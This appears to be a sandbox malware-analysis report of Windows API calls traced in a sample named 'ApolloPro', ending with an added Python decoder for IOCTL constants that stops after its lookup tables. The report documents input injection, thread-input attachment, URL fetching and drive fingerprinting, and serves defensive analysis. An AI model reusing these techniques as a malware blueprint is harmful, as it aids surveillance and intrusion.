                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0068A68A
                                                                                              • __itow.LIBCMT ref: 0068A6BB
                                                                                                • Part of subcall function 0068A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0068A976
                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0068A724
                                                                                              • __itow.LIBCMT ref: 0068A77B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow
                                                                                              • String ID:
                                                                                              • API String ID: 3379773720-0
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 006A70BC
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A70CC
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006A7130
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A713C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                                              • String ID:
                                                                                              • API String ID: 2214342067-0
                                                                                              APIs
                                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006C0980), ref: 006A6B92
                                                                                              • _strlen.LIBCMT ref: 006A6BC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID:
                                                                                              • API String ID: 4218353326-0
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0069BEE1
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0069BF07
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0069BF2C
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0069BF58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006B8F03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 81393bb5b5cf0401daea33014740da4b6f5284f65665160546f06c301648e6f4
                                                                                              • Instruction ID: 3fc4d2932feb5d9c2ce8da8c0dd770d203cb99798cfaab3ae552bde4319811e8
                                                                                              • Opcode Fuzzy Hash: 81393bb5b5cf0401daea33014740da4b6f5284f65665160546f06c301648e6f4
                                                                                              • Instruction Fuzzy Hash: 13318AB4604209EEEB209E18CC49BF837AFEB063A0F144512FA11D72A1CF71EAD1DB51
                                                                                              APIs
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BB1D2
                                                                                              • GetWindowRect.USER32(?,?), ref: 006BB248
                                                                                              • PtInRect.USER32(?,?,006BC6BC), ref: 006BB258
                                                                                              • MessageBeep.USER32(00000000), ref: 006BB2C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: a0fb20f00ae88ca06343fc3600d059b4d24c1bb17064efd0b710a603591fd187
                                                                                              • Instruction ID: ab471963c97fa09e4aee08585e8eaee0fc1856ade761c5a97c478fea0a7887a8
                                                                                              • Opcode Fuzzy Hash: a0fb20f00ae88ca06343fc3600d059b4d24c1bb17064efd0b710a603591fd187
                                                                                              • Instruction Fuzzy Hash: C0415DB0A04119DFDF11CF98C884AFD7BF6FF49351F1491A9E8689B251D7B0AA81CB50
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00691326
                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00691342
                                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006913A8
                                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006913FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 91661668ab6fcc49b05e640ea05d5398c3ff3bb38a17f1195d420285b90e57c5
                                                                                              • Instruction ID: 3dafd283f5188a4eb564d069303e69428f27cb3993b221a6a68bb53a8ef0dbbb
                                                                                              • Opcode Fuzzy Hash: 91661668ab6fcc49b05e640ea05d5398c3ff3bb38a17f1195d420285b90e57c5
                                                                                              • Instruction Fuzzy Hash: 68315A30A40619EEFF308A658C05BFD7BBFAB46320F24431AE4915AFD1D3748D419B95
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00691465
                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00691481
                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 006914E0
                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00691532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: bbad50198ae170b269af48c684088b629e281656ea1c5383c2e99d3e8d7e8ec6
                                                                                              • Instruction ID: a8427c7fc319d83df8edab50b59dbf6b4e8d9d8f057d2e7d4dca1a73098e249f
                                                                                              • Opcode Fuzzy Hash: bbad50198ae170b269af48c684088b629e281656ea1c5383c2e99d3e8d7e8ec6
                                                                                              • Instruction Fuzzy Hash: CF31827094020A9EFF34CB659C04BFE77EFAB8A710F24431BE0815AAD1C3348D428B61
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0066642B
                                                                                              • __isleadbyte_l.LIBCMT ref: 00666459
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00666487
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006664BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: cd1535c4e2475b66ce3a8157a94a545801ac7b70c384cd5267df8c02bb81e5b3
                                                                                              • Instruction ID: 7f6386d50c3277c35535fb40f0cc5580c37e7c275f09ebf988e562c9ea3eef65
                                                                                              • Opcode Fuzzy Hash: cd1535c4e2475b66ce3a8157a94a545801ac7b70c384cd5267df8c02bb81e5b3
                                                                                              • Instruction Fuzzy Hash: 0831B031604256AFDB218F75EC44BBA7BEAFF40360F158169F86487291DF31E851DB50
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 006B553F
                                                                                                • Part of subcall function 00693B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00693B4E
                                                                                                • Part of subcall function 00693B34: GetCurrentThreadId.KERNEL32 ref: 00693B55
                                                                                                • Part of subcall function 00693B34: AttachThreadInput.USER32(00000000,?,006955C0), ref: 00693B5C
                                                                                              • GetCaretPos.USER32(?), ref: 006B5550
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 006B558B
                                                                                              • GetForegroundWindow.USER32 ref: 006B5591
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 5a43aa435242e2dcb37c2429101dcadab815cb5942061de435fe3ad73cb7cf05
                                                                                              • Instruction ID: e36d965d50b56fe8a963599bd7ec5c21303bdef32ad8a3ce547267a74febe7a6
                                                                                              • Opcode Fuzzy Hash: 5a43aa435242e2dcb37c2429101dcadab815cb5942061de435fe3ad73cb7cf05
                                                                                              • Instruction Fuzzy Hash: 23312A72D00108AFDB40EFA5D885DEFF7FAEF98304F10406AE415E7201EA71AE418BA4
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • GetCursorPos.USER32(?), ref: 006BCB7A
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0066BCEC,?,?,?,?,?), ref: 006BCB8F
                                                                                              • GetCursorPos.USER32(?), ref: 006BCBDC
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0066BCEC,?,?,?), ref: 006BCC16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: f1a3dfbb78a1f2a439e443f26087b04c51de4ce47603ca04247f082a2d49897f
                                                                                              • Instruction ID: bdc8b5bb30d573994d332bababe02ba569d0cd81ce9e49263eea98b5669880d3
                                                                                              • Opcode Fuzzy Hash: f1a3dfbb78a1f2a439e443f26087b04c51de4ce47603ca04247f082a2d49897f
                                                                                              • Instruction Fuzzy Hash: CD318D79600018AFCB158F59C859EFE7BB6EB49320F4440A9F9059B361C731AE91EFA0
                                                                                              APIs
                                                                                              • __setmode.LIBCMT ref: 00650BE2
                                                                                                • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00697E51,?,?,00000000), ref: 00644041
                                                                                                • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00697E51,?,?,00000000,?,?), ref: 00644065
                                                                                              • _fprintf.LIBCMT ref: 00650C19
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 0068694C
                                                                                                • Part of subcall function 00654CCA: _flsall.LIBCMT ref: 00654CE3
                                                                                              • __setmode.LIBCMT ref: 00650C4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 521402451-0
                                                                                              • Opcode ID: 5b16b380f327362442b783dd1162abfa8b4a2213e1c8497893398a69cb61b88e
                                                                                              • Instruction ID: 9a77e887d8b24e2ebcf12a792f752cf9d79f601c51049400ae48c5344550575f
                                                                                              • Opcode Fuzzy Hash: 5b16b380f327362442b783dd1162abfa8b4a2213e1c8497893398a69cb61b88e
                                                                                              • Instruction Fuzzy Hash: 22110531904104AADB48B7A4AC43AFE776F9F46322F14019EF904572C2DF31599A97A9
                                                                                              APIs
                                                                                                • Part of subcall function 00688D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00688D3F
                                                                                                • Part of subcall function 00688D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00688D49
                                                                                                • Part of subcall function 00688D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D58
                                                                                                • Part of subcall function 00688D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D5F
                                                                                                • Part of subcall function 00688D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D75
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006892C1
                                                                                              • _memcmp.LIBCMT ref: 006892E4
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0068931A
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00689321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: 6f4efeba2f55440d8bb940cbc62c6f4f16ce22aace4b536f7ff1aedd981dc8c3
                                                                                              • Instruction ID: ad49cadd6661267a987c9d39824212f2af2075b1cf766e5ed658224a9fabae42
                                                                                              • Opcode Fuzzy Hash: 6f4efeba2f55440d8bb940cbc62c6f4f16ce22aace4b536f7ff1aedd981dc8c3
                                                                                              • Instruction Fuzzy Hash: A8219D31E40108EFDB10EFA4C945BFEB7BAEF45301F084199E844AB290D770AA04CBA0
APIs
  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006A1E6F
    • Part of subcall function 006A1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006A1F18
    • Part of subcall function 006A1EF9: InternetCloseHandle.WININET(00000000), ref: 006A1FB5
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: Internet$CloseConnectHandleOpen
  • String ID:
  • API String ID: 1463438336-0
  • Opcode ID: a230c82e1727c6a1f708804955080616e97e13a6197b69436765c38e2ce27c08
  • Instruction ID: 70c7157d6bee5b7d78bf4fab7390b1054e0cf7778207686829ae1aeb65ba853f
  • Opcode Fuzzy Hash: a230c82e1727c6a1f708804955080616e97e13a6197b69436765c38e2ce27c08
  • Instruction Fuzzy Hash: A221CF31200605BFEB15AF609C00FBBB7ABBF86700F10411AFE119A650DB71EC119FA4
APIs
  • GetWindowLongW.USER32(?,000000EC), ref: 006B63BD
  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B63D7
  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B63E5
  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006B63F3
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: Window$Long$AttributesLayered
  • String ID:
  • API String ID: 2169480361-0
  • Opcode ID: c887661d6a7d6325e411bb2346689aa995a6f591b3ad7ba00ff4ead1c9bc278d
  • Instruction ID: 2d7b139464a7cc037d03cffe590db7ebf377d239c5e01ec6248fef59244c1966
  • Opcode Fuzzy Hash: c887661d6a7d6325e411bb2346689aa995a6f591b3ad7ba00ff4ead1c9bc278d
  • Instruction Fuzzy Hash: AC110031300414AFE704AF24CC54FBA77AAEF85320F18521CF916CB2D2CBA5AC41CB98
APIs
    • Part of subcall function 0068F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0068E46F,?,?,?,0068F262,00000000,000000EF,00000119,?,?), ref: 0068F867
    • Part of subcall function 0068F858: lstrcpyW.KERNEL32(00000000,?,?,0068E46F,?,?,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068F88D
    • Part of subcall function 0068F858: lstrcmpiW.KERNEL32(00000000,?,0068E46F,?,?,?,0068F262,00000000,000000EF,00000119,?,?), ref: 0068F8BE
  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068E488
  • lstrcpyW.KERNEL32(00000000,?,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068E4AE
  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068E4E2
Strings
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: lstrcmpilstrcpylstrlen
  • String ID: cdecl
  • API String ID: 4031866154-3896280584
  • Opcode ID: 643ff12a1e6f0a934296cd48ef15093a7c3107b9eaa879766632f8a2da974066
  • Instruction ID: 3b75229582bdbf312d2c01d379c8f68ab3950fd80aa2f8b0ad2cc6bbe024d810
  • Opcode Fuzzy Hash: 643ff12a1e6f0a934296cd48ef15093a7c3107b9eaa879766632f8a2da974066
  • Instruction Fuzzy Hash: 5911D03A200345EFDB25AF64DC45DBA77BAFF45350B50412EF80ACB2A0EB729941C795
APIs
  • _free.LIBCMT ref: 00665331
    • Part of subcall function 0065593C: __FF_MSGBANNER.LIBCMT ref: 00655953
    • Part of subcall function 0065593C: __NMSG_WRITE.LIBCMT ref: 0065595A
    • Part of subcall function 0065593C: RtlAllocateHeap.NTDLL(00DC0000,00000000,00000001,?,?,?,?,00651003,?,0000FFFF), ref: 0065597F
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: AllocateHeap_free
  • String ID:
  • API String ID: 614378929-0
  • Opcode ID: 3370707d4e5948d56cd8840d344f33fd4c831bc55d60e733919764d6e172bd50
  • Instruction ID: 9155d9102e66f0ec943fd55f1743ca9c70c9180e134ef77100bf670371ecc6d8
  • Opcode Fuzzy Hash: 3370707d4e5948d56cd8840d344f33fd4c831bc55d60e733919764d6e172bd50
  • Instruction Fuzzy Hash: 6D110432505F16AFCB602F70AC066AA37979F14BA1F100929FC0ABB390EE7089418784
APIs
  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00694385
  • _memset.LIBCMT ref: 006943A6
  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006943F8
  • CloseHandle.KERNEL32(00000000), ref: 00694401
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: CloseControlCreateDeviceFileHandle_memset
  • String ID:
  • API String ID: 1157408455-0
  • Opcode ID: e7315c7a16f909a5072d64da2866311ad057fc622a9149fbbe2fd022f852fdf0
  • Instruction ID: 0f8e3117fc623a24174357ee8aba66d88483a7d63a256ef8a93eb5e9842b8d78
  • Opcode Fuzzy Hash: e7315c7a16f909a5072d64da2866311ad057fc622a9149fbbe2fd022f852fdf0
  • Instruction Fuzzy Hash: 0A110D75901328BAE7309BA5AC4DFFBBB7CEF44760F00459AF908D7280D6744E808BA4
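The DeviceIoControl call in the function above passes the raw control code 0004D02C with 0x200-byte input and output buffers. The sandbox does not name the IOCTL, so the following decoder, an added example by the editor and not part of the Joe Sandbox report or of the analysed sample, splits a Win32 CTL_CODE into its device type, function, transfer method and access bits and matches it against the SCSI/ATA pass-through codes from ntddscsi.h. The CreateFileW flags from the same listing (C0000000, 00000003, 00000003, 00000080) are decoded too. The constants are the public Windows SDK values; the interpretation that a 512-byte ATA pass-through buffer matches the size of an ATA IDENTIFY DEVICE response (the usual way to read a drive's model and serial for hardware fingerprinting) is the editor's reading of the listing, not a finding of the report.

```python
# Added example: decode the raw Win32 constants shown in a sandbox API listing.
# CTL_CODE(DeviceType, Function, Method, Access) =
#     (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
# All numeric constants below are from the Windows SDK headers (winioctl.h,
# ntddscsi.h, winnt.h); the sample's intent is not inferred beyond them.

METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE)",
                0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM",
                0x12: "FILE_DEVICE_NETWORK", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
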